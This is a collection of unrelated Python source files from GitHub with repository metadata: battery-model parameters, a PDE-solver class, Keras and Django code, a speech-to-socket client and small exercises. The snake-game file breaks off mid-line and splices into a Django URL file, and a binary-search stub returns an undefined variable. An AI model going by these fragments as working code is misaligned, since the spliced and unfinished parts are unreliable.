pybamm.Parameter(\"Separator porosity\")\nepsilon_p = pybamm.Parameter(\"Positive electrode porosity\")\nepsilon = pybamm.Concatenation(\n pybamm.FullBroadcast(epsilon_n, [\"negative electrode\"], \"current collector\"),\n pybamm.FullBroadcast(epsilon_s, [\"separator\"], \"current collector\"),\n pybamm.FullBroadcast(epsilon_p, [\"positive electrode\"], \"current collector\"),\n)\nepsilon_s_n = pybamm.Parameter(\"Negative electrode active material volume fraction\")\nepsilon_s_p = pybamm.Parameter(\"Positive electrode active material volume fraction\")\nepsilon_inactive_n = 1 - epsilon_n - epsilon_s_n\nepsilon_inactive_s = 1 - epsilon_s\nepsilon_inactive_p = 1 - epsilon_p - epsilon_s_p\na_n = a_n_dim * R_n\na_p = a_p_dim * 
R_p\n\n# Electrode Properties\nsigma_cn = sigma_cn_dimensional * potential_scale / i_typ / L_x\nsigma_n = sigma_n_dim * potential_scale / i_typ / L_x\nsigma_p = sigma_p_dim * potential_scale / i_typ / L_x\nsigma_cp = sigma_cp_dimensional * potential_scale / i_typ / L_x\nsigma_cn_prime = sigma_cn * delta ** 2\nsigma_n_prime = sigma_n * delta\nsigma_p_prime = sigma_p * delta\nsigma_cp_prime = sigma_cp * delta ** 2\nsigma_cn_dbl_prime = sigma_cn_prime * delta\nsigma_cp_dbl_prime = sigma_cp_prime * delta\n# should rename this to avoid confusion with Butler-Volmer\nalpha = 1 / (sigma_cn * delta ** 2 * l_cn) + 1 / (sigma_cp * delta ** 2 * l_cp)\nalpha_prime = alpha / delta\n\n# Electrolyte Properties\nt_plus = pybamm.Parameter(\"Cation transference number\")\nbeta_surf = 0\ns = 1 - t_plus\n\n\n# (1-2*t_plus) is for Nernst-Planck\n# 2*(1-t_plus) for Stefan-Maxwell\n# Bizeray et al (2016) \"Resolving a discrepancy ...\"\n# note: this is a function for consistancy with lead-acid\ndef chi(c_e):\n return 2 * (1 - t_plus)\n\n\n# Electrochemical Reactions\nC_dl_n = (\n C_dl_dimensional * potential_scale / interfacial_current_scale_n / tau_discharge\n)\nC_dl_p = (\n C_dl_dimensional * potential_scale / interfacial_current_scale_p / tau_discharge\n)\n\n# Electrical\nvoltage_low_cut = (voltage_low_cut_dimensional - (U_p_ref - U_n_ref)) / potential_scale\nvoltage_high_cut = (\n voltage_high_cut_dimensional - (U_p_ref - U_n_ref)\n) / potential_scale\n\n# Thermal\nrho_cn = pybamm.thermal_parameters.rho_cn\nrho_n = pybamm.thermal_parameters.rho_n\nrho_s = pybamm.thermal_parameters.rho_s\nrho_p = pybamm.thermal_parameters.rho_p\nrho_cp = pybamm.thermal_parameters.rho_cp\n\nrho_k = pybamm.thermal_parameters.rho_k\nrho = rho_n * l_n + rho_s * l_s + rho_p * l_p\n\nlambda_cn = pybamm.thermal_parameters.lambda_cn\nlambda_n = pybamm.thermal_parameters.lambda_n\nlambda_s = pybamm.thermal_parameters.lambda_s\nlambda_p = pybamm.thermal_parameters.lambda_p\nlambda_cp = 
pybamm.thermal_parameters.lambda_cp\n\nlambda_k = pybamm.thermal_parameters.lambda_k\n\nTheta = pybamm.thermal_parameters.Theta\nh = pybamm.thermal_parameters.h\nB = (\n i_typ\n * R\n * T_ref\n * tau_th_yz\n / (pybamm.thermal_parameters.rho_eff_dim * F * Delta_T * L_x)\n)\n\n# Initial conditions\nc_e_init = c_e_init_dimensional / c_e_typ\nc_n_init = c_n_init_dimensional / c_n_max\nc_p_init = c_p_init_dimensional / c_p_max\nT_init = pybamm.thermal_parameters.T_init\n\n\n# --------------------------------------------------------------------------------------\n\"5. Dimensionless Functions\"\n\n\ndef D_e(c_e, T):\n \"Dimensionless electrolyte diffusivity\"\n c_e_dimensional = c_e * c_e_typ\n T_dim = Delta_T * T + T_ref\n return D_e_dimensional(c_e_dimensional, T_dim) / D_e_dimensional(c_e_typ, T_ref)\n\n\ndef kappa_e(c_e, T):\n \"Dimensionless electrolyte conductivity\"\n c_e_dimensional = c_e * c_e_typ\n kappa_scale = F ** 2 * D_e_dimensional(c_e_typ, T_ref) * c_e_typ / (R * T_ref)\n T_dim = Delta_T * T + T_ref\n return kappa_e_dimensional(c_e_dimensional, T_dim) / kappa_scale\n\n\ndef D_n(c_s_n, T):\n \"Dimensionless negative particle diffusivity\"\n c_s_n_dimensional = c_s_n * c_n_max\n T_dim = Delta_T * T + T_ref\n return D_n_dimensional(c_s_n_dimensional, T_dim) / D_n_dimensional(c_n_max, T_ref)\n\n\ndef D_p(c_s_p, T):\n \"Dimensionless positive particle diffusivity\"\n c_s_p_dimensional = c_s_p * c_p_max\n T_dim = Delta_T * T + T_ref\n return D_p_dimensional(c_s_p_dimensional, T_dim) / D_p_dimensional(c_p_max, T_ref)\n\n\ndef m_n(T):\n \"Dimensionless negative reaction rate\"\n T_dim = Delta_T * T + T_ref\n return m_n_dimensional(T_dim) / m_n_ref_dimensional\n\n\ndef m_p(T):\n \"Dimensionless positive reaction rate\"\n T_dim = Delta_T * T + T_ref\n return m_p_dimensional(T_dim) / m_p_ref_dimensional\n\n\ndef U_n(c_s_n, T):\n \"Dimensionless open-circuit potential in the negative electrode\"\n sto = c_s_n\n T_dim = Delta_T * T + T_ref\n return 
(U_n_dimensional(sto, T_dim) - U_n_ref) / potential_scale\n\n\ndef U_p(c_s_p, T):\n \"Dimensionless open-circuit potential in the positive electrode\"\n sto = c_s_p\n T_dim = Delta_T * T + T_ref\n return (U_p_dimensional(sto, T_dim) - U_p_ref) / potential_scale\n\n\ndef dUdT_n(c_s_n):\n \"Dimensionless entropic change in negative open-circuit potential\"\n sto = c_s_n\n return dUdT_n_dimensional(sto) * Delta_T / potential_scale\n\n\ndef dUdT_p(c_s_p):\n \"Dimensionless entropic change in positive open-circuit potential\"\n sto = c_s_p\n return dUdT_p_dimensional(sto) * Delta_T / potential_scale\n\n\n# --------------------------------------------------------------------------------------\n\"6. Input current\"\ndimensional_current_with_time = pybamm.FunctionParameter(\n \"Current function\", pybamm.t * tau_discharge\n)\ndimensional_current_density_with_time = dimensional_current_with_time / (\n n_electrodes_parallel * pybamm.geometric_parameters.A_cc\n)\n\ncurrent_with_time = (\n dimensional_current_with_time / I_typ * pybamm.Function(np.sign, I_typ)\n)\n","repo_name":"zlgenuine/pybamm","sub_path":"pybamm/parameters/standard_parameters_lithium_ion.py","file_name":"standard_parameters_lithium_ion.py","file_ext":"py","file_size_in_byte":14866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70582535492","text":"import os\nimport math\nfrom importlib import reload\nfrom itertools import product\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom IPython.display import display\n\nimport nnpde.iterative_methods as im\nfrom nnpde.metrics import least_squares_loss as LSE\nfrom nnpde import geometries, helpers\nfrom nnpde.utils.logs import enable_logging, logging \nfrom nnpde.problems import DirichletProblem, after_solver\nfrom nnpde.utils import plots\nimport nnpde.model as M \nimport 
nnpde.model_testing as MT\nimport nnpde.problems as PDEF\nfrom nnpde.grid_search import grid_search\n\nfrom tqdm.notebook import tqdm\n\nclass Grid_Object:\n \"\"\"Geometry class\n\n Parameters\n ----------\n n_dims : int, dimensionality of data\n \n cube_coords: borders of cube. given as [n_dims, 2] tensor \n\n N: torch.tensor [n_dims]. number of grid points on each side\n \n h: float !!!. note that if N is given it has to make sure,\n that h in each dimension is the same\n\n Returns\n -------\n self : object\n Returns an instance of self.\n \"\"\"\n\n def __init__(self,\n n_dims,\n cube_coords,\n N = None, h = None):\n\n self.n_dims = n_dims\n self.cube_coords = cube_coords\n self.N = N\n self.h = h\n\n if h is None:\n self.h = (cube_coords[0, 1] - \n cube_coords[0, 0])/(N[0]-1)\n\n if N is None:\n ans = list()\n for i in range(n_dims):\n ans.append(math.floor((cube_coords[i, 1] - cube_coords[i, 0])/(h)))\n self.N = torch.tensor(ans, dtype=torch.long) + 1\n self.h = (cube_coords[0, 1] - \n cube_coords[0, 0])/(self.N[0]-1)\n # N might be different from given h, so it is easier to shif h for found N\n\n self.grad_log = None\n\n def get_logs(self, distribution):\n grd_size = torch.cat((torch.tensor([self.n_dims]), self.N))\n self.grad_log = torch.zeros(grd_size.tolist())\n\n ind = torch.zeros(self.n_dims, dtype=torch.int)\n over = False\n\n while not over:\n point = []\n for i in range(self.n_dims):\n x = self.cube_coords[i, 0] + self.h*ind[i]\n point.append(x)\n\n point = torch.tensor(point, requires_grad = True)\n val = distribution.log_prob(point)\n val.backward()\n\n for i in range(self.n_dims):\n self.grad_log[tuple([i, *ind.tolist()])] = point.grad[i]\n over = True\n\n for i in range(self.n_dims):\n ind[i] += 1\n if ind[i] == self.N[i]:\n ind[i] = 0\n else:\n over = False\n break\n self.grad_log = self.grad_log.reshape([1, *grd_size.tolist()])\n\n\n def set_borders(self):\n B_idx = torch.zeros(self.N.tolist())\n B = torch.zeros(self.N.tolist())\n\n ind = 
torch.zeros(self.n_dims, dtype=torch.int)\n over = False\n\n while not over:\n if torch.any(ind == 0) or torch.any(ind == self.N-1):\n B[tuple(ind.tolist())] = torch.rand([1])\n B_idx[tuple(ind.tolist())] = 0\n else:\n B[tuple(ind.tolist())] = 0\n B_idx[tuple(ind.tolist())] = 1\n\n over = True\n\n for i in range(self.n_dims):\n ind[i] += 1\n if ind[i] == self.N[i]:\n ind[i] = 0\n else:\n over = False\n break\n return B_idx.reshape([1, 1, *self.N.tolist()]), B.reshape([1, 1, *self.N.tolist()])\n\n def create_f_grid(self, function):\n ans = torch.zeros(self.N.tolist())\n\n ind = torch.zeros(self.n_dims, dtype=torch.int)\n over = False\n\n while not over:\n\n point = []\n for i in range(self.n_dims):\n x = self.cube_coords[i, 0] + self.h*ind[i]\n point.append(x)\n \n point = torch.tensor(point).reshape(1, -1)\n\n ans[tuple(ind.tolist())] = function(point)\n over = True\n\n for i in range(self.n_dims):\n ind[i] += 1\n if ind[i] == self.N[i]:\n ind[i] = 0\n else:\n over = False\n break\n return ans.reshape([1, 1, *self.N.tolist()])\n\n\n\nclass Solve_Area:\n \"\"\"Implemented solver for stein cv\n\n Parameters\n ----------\n n_dims : int, dimensionality of data\n \n cube_coords: borders of cube. given as [n_dims, 2] tensor\n\n N: torch.tensor [n_dims]. 
number of grid points on each side\n \n h: torch.tensor [n_dims], distance between adjacent nodes on each coordinate\n \n\n Returns\n -------\n self : object\n Returns an instance of self.\n \"\"\"\n\n def __init__(self,\n n_dims,\n cube_coords,\n distribution,\n N = None, h = None):\n\n\n if N is None and h is None:\n raise ValueError('Specify N or h')\n\n self.my_grid = Grid_Object(n_dims, cube_coords, N, h)\n\n self.my_grid.get_logs(distribution) # calculates gradient in all nodes of grid and saves them as GridObject attribute\n\n self.my_solver = None\n\n self.aslv = None\n\n def train_model(self, base_parameters, prob_inst = 20, f = None):\n # For each problem instance define number of iteration to perform to obtain the solution\n problem_instances = []\n for i in tqdm(range(prob_inst)):\n k = np.random.randint(1, 20)\n problem_instances.append(DirichletProblem(k=k, grid = self.my_grid, f = f))\n\n self.my_solver = M.JacobyWithConv(**base_parameters)\n self.my_solver.fit(problem_instances)\n self.my_solver.net.eval()\n\n def solve_setting(self, function, samples, k = 1000):\n mean_val = torch.mean(function(samples))\n f_table = self.my_grid.create_f_grid(function) - mean_val\n self.aslv = after_solver(f = f_table, grid = self.my_grid, \n k = k, model = self.my_solver)\n\n def get_cv(self, points):\n #points : [n_points, n_dims]\n # note: this works for currently set aslv\n # current heuristic: cv of point equals to cv of closest node on grid\n ans = []\n for point in points:\n closest_on_grid = []\n n = len(self.my_grid.N.tolist())\n for i in range(n):\n coords = torch.linspace(self.my_grid.cube_coords[i, 0],\n self.my_grid.cube_coords[i, 1],\n self.my_grid.N[i])\n j = torch.argmin(torch.abs(coords - point[i]))\n closest_on_grid.append(j)\n ans.append(self.aslv.sec_der[tuple([0, 0, *closest_on_grid])])\n return 
torch.tensor(ans)\n\n\n\n","repo_name":"ArturGoldman/NN_DE_solver","sub_path":"poiss_sol_general/nnpde/solve_area.py","file_name":"solve_area.py","file_ext":"py","file_size_in_byte":7063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15063202194","text":"import re\nimport sys\ninput = sys.stdin.readline\n\nn=int(input())\narr = [[1 for _ in range(n+1)] for _ in range(n+1)]\n\nk=int(input())\napples = [list(map(int, input().split())) for _ in range(k)]\nfor y,x in apples:\n arr[y][x]=-1\n\nl=int(input())\ndirections = [list(map(int, input().split())) for _ in range(l)]\n\ntail_y=0\ntail_x=0\ny=1\nx=1\n\ndirection = 0 # 0:동, 1:남, 2:서, 3:북\ndy=[1,0,0,-1]\ndx=[0,1,-1,0]\ncnt=0\n\nfor weight, next_direction in directions:\n \n for _ in range(weight):\n next_y = y+dy[direction]\n next_x = x+dx[direction]\n \n if 0', views.product_list,name='product_list_category'),\n path('', views.product_detail,name='product_detail'),\n]\n","repo_name":"MoatazMohamedAllam/Olex-Clone","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74490987333","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\nfrom datetime import datetime\nimport operator\nimport itertools\n\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\"\"\"\nTASK 4:\nThe telephone company want to identify numbers that might be doing\ntelephone marketing. 
Create a set of possible telemarketers:\nthese are numbers that make outgoing calls but never send texts,\nreceive texts or receive incoming calls.\n\nPrint a message:\n\"These numbers could be telemarketers: \"\n\nThe list of numbers should be print out one per line in lexicographic order with no duplicates.\n\"\"\"\n\n# lets creaate variables to dissect to dissect the two tables\n\n# creating a set to store unique telephone numbers from the calls and texts lists outgoing and receiving\n\n# i will get a set with phone numbers making calls and sending texts outgoing()\n# also another set with phones receiving calls and receiving texts non_tele()\n# then , get the difference to extract possible telemarketers\n\noutgoing = set()\nnon_tele = set()\n\nfor call in calls:\n outgoing.add(call[0])\n non_tele.add(call[1])\n\nfor text in texts:\n outgoing.add(text[0])\n non_tele.add(text[1])\n \n# the difference are possible telemarketers stored in telemarketers \n\ntelemarketers = outgoing.difference(non_tele)\n \nprint(\"These numbers could be telemarketers: \",'\\n'.join(map(str, sorted(telemarketers)))) \n \n\n\n \n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"cfreeman22/Data-Structures-And-Algorithms-","sub_path":"submit/Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69794213162","text":"import pandas as pd \r\n\r\ndataaf = pd.read_csv(r\"C:\\Users\\User\\Desktop\\Artificial intelligence\\Machine learning\\Deep learning\\Amazon frr deep\\clean data\\dataaftercleanafterlemm.csv\")\r\n\r\n \r\nfrom keras.preprocessing.text import Tokenizer\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.layers import Embedding, LSTM, Dense\r\nfrom keras.models import Sequential\r\n\r\n# to make sure there is no float in data\r\nfor i in range (len(dataaf[\"cleantext\"])):\r\n 
dataaf.iloc[i,1]=str(dataaf.iloc[i,1])\r\n\r\n\r\nx = dataaf[\"cleantext\"]\r\ny = dataaf[\"label_name\"].values # Convert \"Sentiment\" to a NumPy array\r\ntokenizer = Tokenizer()\r\ntokenizer.fit_on_texts(x)\r\nsequences = tokenizer.texts_to_sequences(x)\r\n\r\nword_index = tokenizer.word_index\r\nvocab_size = len(word_index) + 1\r\nmax_sequence_length = 100#to control the length of the sequences\r\npadded_sequences = pad_sequences(sequences, maxlen=max_sequence_length)\r\n\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(padded_sequences, y, test_size=0.2, random_state=42)\r\n\r\nembedding_dim = 70\r\nmodel = Sequential()\r\nmodel.add(Embedding(input_dim=vocab_size, output_dim=embedding_dim, input_length=max_sequence_length))\r\nmodel.add(LSTM(128))\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dense(1, activation='linear'))\r\nmodel.compile(loss='mean_squared_error', optimizer='adam')\r\nmodel.summary()\r\n\r\nmodel.fit(X_train, y_train, batch_size=50, epochs=10)\r\n\r\nmse = model.evaluate(X_test, y_test)\r\nprint(\"Mean Squared Error:\", mse)\r\n\r\n\r\n\r\n# saving the model\r\nmodel.save(r\"C:\\Users\\User\\Desktop\\Artificial intelligence\\Machine learning\\Deep learning\\Amazon frr deep\\deepmodel.h5\")\r\n\r\nimport pickle\r\n\r\nfile_path = r\"C:\\Users\\User\\Desktop\\Artificial intelligence\\Machine learning\\Deep learning\\Amazon frr deep\\tokenizer.pickle\"\r\nwith open(file_path, 'wb') as handle:\r\n pickle.dump(tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n","repo_name":"Baraa-Melhem/Amazon_ffr","sub_path":"Amazon frr deep/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36959551174","text":"# -*- coding : UTF-8 -*-\n\nfrom collections import deque\n\nn,k = map(int,input().split())\nw = 
[]\nfor _ in range(n):\n w.append(int(input()))\n\ndef v(P):\n # 最大荷重をPとしたときに、詰める荷物の総重量を求める関数\n # P >= max(w) の範囲でのみ考える\n\n track = {}\n num = 0\n\n for i in range(1,k+1):\n s = 0\n while s + w[num] <= P:\n s+=w[num]\n num+=1\n\n if num == n:\n return n\n\n return num\n\ndef solve():\n left = 0\n right = 100000 * 10000\n\n mid = (left+right)//2\n \n return P","repo_name":"mochita314/algorithm","sub_path":"spiral/alds1_4_d.py","file_name":"alds1_4_d.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"69967046442","text":"\"\"\"\nDescription: Compare the output from our 2 methods of acquiring ESI data (polygon vs tif/row/col method.)\nCompare values across the 8 closest pixels (user can change that value).\nTo get the closest pixels, I used centroids (or middle of the pixel) long/lats.\nNOTE TO SELF: I should change the distance comparison using the haversine method!!!\n\nFile Name: get_ESI_tif.py\nAuthor: Carol A. Rowe\nDate Created: 2021-05-10\n\nUsage: python ESI_output_comparison.py SCAN_AL_metadata.csv poly_ESI_df.csv ESI_tif2select_pt.csv master_ESI_CLIP_xyz.csv\n\nTHIS IS IN PROGRESS....MAY NOT BE FUNCTIONAL AS A STAND-ALONE SCRIPT AS OF YET!!!!!!\n\"\"\"\n\n__author__ = \"Carol A. 
Rowe\"\n\nimport pandas as pd\nimport argparse\n\ndef ESI_output_comparison(metadata, poly_ESI, tif_ESI, xyz, date, num_nearest):\n metad = pd.read_csv(metadata)\n meta = metad[['longitude', 'latitude', 'stationTriplet']]\n poly = pd.read_csv(poly_ESI)\n tif = pd.read_csv(tif_ESI)\n xyz = pd.read_csv(xyz)\n\n # want the print statements into a txt file\n with open(\"comparison_output.txt\", \"a\") as f:\n # for each station print out comparison of 8 closest pts in the centroids\n for i in range(0,meta.shape[0]):\n # Getting the actual lat/long coords\n xx = meta.loc[i, 'longitude'].astype(float)\n yy = meta.loc[i, 'latitude'].astype(float)\n print('---------------------NEXT-------------------', file=f)\n print('Actual location: {}', format(xx, yy), file=f)\n # get station name\n stn = meta.loc[i, 'stationTriplet']\n print('Station is: {}'.format(stn), file=f)\n # get the lat and long closest to the centroid lat/long (output from either merge_esi_csv.py or tif2xyz.sh)\n # getting the 8 closest centroids using absolute value of subtracting the actual lat/long to centroid lat/long\n # this returns a pd.Series with the index values of the 8 centroids\n index_xyz = ( xyz['x'].sub(xx).abs() + xyz['y'].sub(yy).abs()).argsort()[:num_nearest]\n # make a list of the index values of the 8 closest centroids\n index_list = index_xyz.values.tolist()\n # use index values to subset the xyz dataframe\n xyz_mini = xyz.iloc[index_list, :]\n # make a new column to show a proxy of dist between pt and centroid using absolute value of simple subtraction\n xyz_mini['abs_min'] = ((xyz_mini['x']-xx).abs()) + ((xyz_mini['y']-yy).abs())\n\n # get the ESI value from the poly csv file; apply that value to entire new column\n poly_mini = poly[ (poly['station']==stn) & (poly['date']==date)]\n poly_mini.reset_index(drop=True, inplace=True)\n poly_vals = poly_mini.loc[0,'avg']\n # add value to the output dataframe\n xyz_mini['poly'] = poly_vals\n\n # get the ESI value from the tif csv file; apply 
that value to entire new column\n tif_mini = tif[ (tif['station']==stn) & (tif['Date']==date)]\n tif_mini.reset_index(drop=True, inplace=True)\n tif_vals = tif_mini.loc[0,'ESI']\n # add value to the output dataframe\n xyz_mini['tif'] = tif_vals\n\n print(xyz_mini, file=f)\n\n# if name in main so that we can run the script by itself (main)\n# or, it can be used embedded (import ESI_tf_clip.py) within another script\nif __name__ in '__main__':\n # This allows the --help to show the docstring\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)\n # Add the input arguments: 4 mandatory, 2 optional\n parser.add_argument('metadata', metavar='metadata.csv', help=\"Enter the pathway and filename for your shapefile. i.e. './SCAN_metadata.csv' File must contain columns: longitude, latitude, stationTriplet\")\n parser.add_argument('poly_ESI', metavar='poly_ESI_df.csv', help=\"Enter the pathway and filename for your poly_ESI_df.csv file. This is the output file from script:get_ESI_select_pt.py\")\n parser.add_argument('tif_ESI', metavar='ESI_tif2select_pt.csv', help=\"Enter the pathway and filename for your ESI_tif2select_pt.csv file. This is the output file from script: tif2select_pts.py\")\n parser.add_argument('xyz', metavar='master_ESI_CLIP_xyz.csv', help=\"Enter the pathway and filename to your master_ESI_CLIP_xyz.csv or individual _CLIP.csv file. Output from either tif2xyz.sh or merge_esi_csv.py\")\n\n # Next 2 arguments are optional\n parser.add_argument('-d', '--date', help=\"Enter date of ESI file as yyyy-mm-dd\", type=str,\n default='2021-03-30', required=False)\n parser.add_argument('-n', '--num_nearest',\n help=\"Enter the number of nearest centroids you want to compare to. 
Default = 8\",\n type=int, default=8, required=False)\n\n # array for all arguments passed to the script\n args = parser.parse_args()\n\n # now you can access the arguments input by the user and apply to our function\n ESI_output_comparison(args.metadata, args.poly_ESI, args.tif_ESI, args.xyz, args.date, args.num_nearest)\n","repo_name":"carol-rowe666/ClimateSERV_ESI_data","sub_path":"Comparison_SCRIPTS/ESI_output_comparison.py","file_name":"ESI_output_comparison.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14757474851","text":"def letters_filter(file):\n letters_dict = dict()\n for i_line in file:\n for i_letter in i_line.lower():\n if i_letter.isalpha():\n if i_letter not in letters_dict:\n letters_dict[i_letter] = 0\n letters_dict[i_letter] += 1\n return letters_dict\n\n\ndef letters_sort(letters_dict):\n letters_l = []\n letters_total = sum(letters_dict.values())\n for sym, freq in letters_dict.items():\n freq_percent = round(freq / letters_total, 3)\n letters_l.append([sym, freq_percent])\n\n return sorted(letters_l, key=lambda x: (-x[1], x[0]))\n\n\ndef text_sort(sorted_list):\n text = ''\n for i_line in sorted_list:\n text += i_line[0] + ' ' + str(i_line[1]) + '\\n'\n return text\n\n\nfile_from = open('text.txt', 'r')\nletters_dict = letters_filter(file_from)\nfile_from.close()\nletters_list = letters_sort(letters_dict)\ntext = text_sort(letters_list)\n\nfile_to = open('analysis.txt', 'w')\nfile_to.write(text)\nfile_to.close()\n","repo_name":"Elfateru/python_basic","sub_path":"Module22/08_frequency_analysis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32409281842","text":"import speech_recognition as sr\nimport socketio\nimport datetime\nimport uuid\n\n\nfor index, name in 
enumerate(sr.Microphone.list_microphone_names()):\n print(\"Microphone with name \\\"{1}\\\" found for `Microphone(device_index={0})`\".format(index, name))\n\n\ndef send_detected_voice(text, time, uniqueId):\n detestedVoice = {}\n detestedVoice[\"comment\"] = text\n detestedVoice[\"time\"] = time\n detestedVoice[\"uniqueId\"] = uniqueId\n return detestedVoice\n\n\ndef speech_recognition():\n sio = socketio.Client()\n sio.connect('https://univas.herokuapp.com/')\n \n print(\"なにか話してください\")\n\n while True:\n\n # 音声入力\n r = sr.Recognizer()\n\n #print(sr.Microphone.list_microphone_names())\n #device_index=0\n with sr.Microphone(device_index=3) as source:\n\n audio = r.listen(source)\n\n try:\n # Google Web Speech APIで音声認識 ko-KR en-US ja-JP\n text = r.recognize_google(audio, language=\"ja-JP\")\n\n except sr.UnknownValueError:\n text = None\n print(\"音声を認識できませんでした\")\n\n except sr.RequestError as e:\n text = None\n print(\"音声認識を要求できませんでした: {0}\".format(e))\n\n else:\n time = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n formated_time = str(time)\n uniqueId = 'FRIST'\n sio.emit('send-detected-voice', send_detected_voice(text, formated_time, uniqueId))\n\n finally:\n print(text)\n text = None\n\n\nif __name__ == '__main__':\n speech_recognition()\n","repo_name":"taka1109y/univas-ai","sub_path":"SpeechRecognition.py","file_name":"SpeechRecognition.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37611615318","text":"import itertools\r\nimport os\r\nfrom test_seq import run\r\nimport time\r\n# need the train to to return some valus to store in a table \r\n# loop for the layers\r\n\r\ntotal_number = 25\r\nindex = 0\r\nfilepath = \"sample_peaks_4.npy\"\r\nstart = time.time()\r\n# possible size of the number of hidden units \r\nhidden_units = [128,64,32,16,8]\r\nfor layers in range(1,4):\r\n # get every n C r for the hidden units with repeats \r\n combs = 
list(itertools.combinations(hidden_units,layers))\r\n for num_hidden in combs:\r\n num_hidden = list(num_hidden)\r\n num_hidden_names = \",\".join([str(x) for x in num_hidden])\r\n prefix = f\"layers{len(num_hidden)}\"\r\n print(f\"SequentialModel_{num_hidden_names}\")\r\n run(filepath, prefix, num_hidden, num_epochs=2000, num_random=10)\r\n index +=1\r\n print(f\"Done with: {index}/{total_number}\")\r\nprint(f\"Total Time: {time.time()-start}\")\r\n","repo_name":"noverney/EEG_Dev","sub_path":"run_all_seq.py","file_name":"run_all_seq.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"27090339370","text":"import numpy as np\nimport sys\nimport itertools\nimport csv\n\n# star, all edges point inside to center\n\ndef main():\n filename = \"toy1.txt\"\n # the value of n is provided by the filename.txt\n n = 16\n # the value of num_comment is the line of comment at the beginning of the filename\n num_comment = 4\n\n\n with open(filename) as f:\n content = f.readlines()\n\n content = [x.strip() for x in content]\n\n v_from = {}\n\n for line in content[4:]:\n pair = line.split()\n if int(pair[1]) not in v_from:\n v_from[int(pair[1])]=[]\n v_from[int(pair[1])].append(int(pair[0]))\n\n\n v_to = {}\n\n for line in content[4:]:\n pair = line.split()\n if int(pair[0]) not in v_to:\n v_to[int(pair[0])]=[]\n v_to[int(pair[0])].append(int(pair[1]))\n\n\n l = []\n\n del_v_to = []\n for size in list(reversed(list(range(3,21)))):\n #remove list that is already used once\n if(len(del_v_to) != 0):\n #print(del_v_to)\n for item in del_v_to:\n #print(item)\n #print(v_to)\n del v_to[item]\n del_v_to.remove(item)\n\n for item in v_to:\n\n els = [list(x) for x in itertools.combinations(v_to[item], size)]\n #double counting for stars\n if(len(els) != 0): del_v_to.append(item)\n \n #print('els1')\n for it in els:\n mat = np.zeros(n)\n mat[item] = 1\n for i in range(len(it)):\n mat[it[i]] = 
1\n\n l.append(mat)\n\n\n print(l)\n with open('toy1_output_s.csv','w') as f:\n writer = csv.writer(f)\n writer.writerows(l)\n\n\nif __name__=='__main__':\n main()\n","repo_name":"NoSegfault/h_m_c_s","sub_path":"data/stars_specific.py","file_name":"stars_specific.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31230534604","text":"\"\"\"Testimony model tests.\"\"\"\nimport showcase_site.models\nfrom showcase_site.factory import TestimonyFactory\nfrom tests.utils import ModelTestCase\n\n\nclass TestimonyTest(ModelTestCase):\n \"\"\"Test the Testimony model.\"\"\"\n\n model = showcase_site.models.Testimony\n field_tests = {\n 'created': {\n 'verbose_name': 'ajouté le',\n },\n 'source': {\n 'max_length': 300,\n },\n 'quote': {\n 'verbose_name': 'citation',\n },\n }\n model_tests = {\n 'verbose_name': 'témoignage',\n 'ordering': ('-created', 'source'),\n }\n\n @classmethod\n def setUpTestData(cls):\n cls.obj: showcase_site.models.Testimony = TestimonyFactory.create()\n\n def test_preview_is_40_characters_max(self):\n quote = self.obj.quote\n max_len = self.obj.PREVIEW_LENGTH\n expected = (len(quote) > max_len) and quote[:max_len] + '...' 
